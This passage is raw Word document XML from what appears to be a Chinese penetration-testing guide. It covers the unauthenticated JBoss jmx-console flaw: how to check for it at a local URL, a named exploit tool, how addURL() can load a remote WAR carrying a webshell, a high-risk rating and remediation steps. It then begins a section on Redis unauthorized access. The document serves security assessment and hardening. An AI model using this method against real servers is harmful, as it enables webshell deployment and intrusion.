        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于采用</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JBOSS</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网站，首先判断其版本，如果版本为</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.0.x</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本，则可通过对其控制台的访问来判断，访问</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8080/jmx-console/</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，出现以下页面，则此漏洞可被利用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C2AF35" w14:textId="2554CD1B" w:rsidR="00092E41" w:rsidRPr="005E3E54" w:rsidRDefault="002258E6" w:rsidP="005E3E54">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3461E2C3" wp14:editId="2A4512E8">
            <wp:extent cx="3886200" cy="838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14:paraId="64C86C2D" w14:textId="3EE7E367" w:rsidR="00092E41" w:rsidRPr="005E3E54" w:rsidRDefault="00092E41" w:rsidP="005E3E54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者用工具</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jboss_exploit_fat.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来判断是否存在漏洞，如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1FFDF" w14:textId="5CE24052" w:rsidR="009F1C76" w:rsidRPr="005E3E54" w:rsidRDefault="00092E41" w:rsidP="005E3E54">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="174B8BA6" wp14:editId="091A9C13">
            <wp:extent cx="4017645" cy="77851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7645" cy="778510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="706DDAFD" w14:textId="614CE991" w:rsidR="009F1C76" w:rsidRPr="005E3E54" w:rsidRDefault="00C24790" w:rsidP="005E3E54">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009F1C76" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JBOSS</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认配置会有一个后台漏洞，漏洞发生在</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jboss.deployment</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命名空间，中的</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>addURL()</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该函数可以远程下载一个</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>war</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩包并解压。</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果压缩包里含有</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="00A23CD8" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，是直接可以解析的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41771119" w14:textId="77777777" w:rsidR="009F1C76" w:rsidRPr="005E3E54" w:rsidRDefault="009F1C76" w:rsidP="005E3E54">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7C939" w14:textId="054BAC18" w:rsidR="009F1C76" w:rsidRPr="005E3E54" w:rsidRDefault="009C4061" w:rsidP="005E3E54">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759C62F0" w14:textId="77777777" w:rsidR="009F57F1" w:rsidRPr="005E3E54" w:rsidRDefault="009F1C76" w:rsidP="005E3E54">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="009F57F1" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r w:rsidR="009F57F1" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jmx-console</w:t>
      </w:r>
      <w:r w:rsidR="009F57F1" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加上访问密码并且执行以下修复方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C8FF8" w14:textId="4B93FA4A" w:rsidR="009F57F1" w:rsidRPr="005E3E54"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在</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${jboss.server.home.dir}/deploy</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面找到</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jmx-console.war</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB-INF/web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件去掉</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>security-constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>块的注释，使其起作用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BDD75" w14:textId="77777777" w:rsidR="009F57F1" w:rsidRPr="005E3E54"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编辑以下文件：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="836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9F57F1" w:rsidRPr="005E3E54" w14:paraId="2B9E5D87" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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EBAC77"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编辑</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28443EB4"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WEB-INF/classes/jmx-console-users.properties</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D264167"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或</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA7E73C"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server/default/conf/props/jmx-console-users.properties (version &gt;=4.0.2)</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3E54">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3E54">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="075EA1F9"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WEB-INF/classes/jmx-console-roles.properties</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54787146"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或</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3E54">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">server/default/conf/props/jmx-console-roles.properties(version &gt;=4.0.2) </w:t>
            </w:r>
            <w:r w:rsidRPr="005E3E54">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加用户名密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7576C860" w14:textId="35916747" w:rsidR="009F57F1" w:rsidRPr="005E3E54"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编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB-INF/jboss-web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去掉</w:t>
      </w:r>
      <w:r w:rsidR="00C237FB" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> security-domain</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>块的注释，</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>security-domain</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值的映射文件为</w:t>
      </w:r>
      <w:r w:rsidR="00C237FB" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login-config.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（该文件定义了登录授权方式）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86B057" w14:textId="3B478F3E" w:rsidR="00B3517F"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对于</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>invoker</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用以下方案：升级相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JBOSS</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件到最新版本，或者删除</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> $JBOSS_HOME/[server]/all/deploy </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$JBOSS_HOME/[server]/default/deploy</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Jmx-console.war </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web-console.war</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两个</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.War</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件来禁止对</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jmx-console</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web-console</w:t>
      </w:r>
      <w:r w:rsidR="00C237FB" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4FCF1A" w14:textId="0D166C98" w:rsidR="005043FA" w:rsidRPr="005E3E54" w:rsidRDefault="005043FA" w:rsidP="005043FA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简"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4EC6E4B7" w14:textId="4E2911D3" w:rsidR="00680E2B" w:rsidRPr="00F757E4" w:rsidRDefault="00680E2B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc498434569"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方应用相关漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A58A4" w14:textId="12810B38"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="000524FA" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidR="000524FA" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="000524FA" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Memcached</w:t>
      </w:r>
      <w:r w:rsidR="000524FA" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等非关系型数据库，</w:t>
      </w:r>
      <w:r w:rsidR="000524FA" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Zabbix</w:t>
      </w:r>
      <w:r w:rsidR="000524FA" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等其他第三方应用存在的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D759A8" w14:textId="488CA541"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00A35B8D" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidR="00A35B8D" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidR="00A35B8D" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未授权访问为例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FF9890" w14:textId="5C0EF563" w:rsidR="00A35B8D" w:rsidRPr="004342B6" w:rsidRDefault="00945908" w:rsidP="004342B6">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>RedisDesktopManager</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
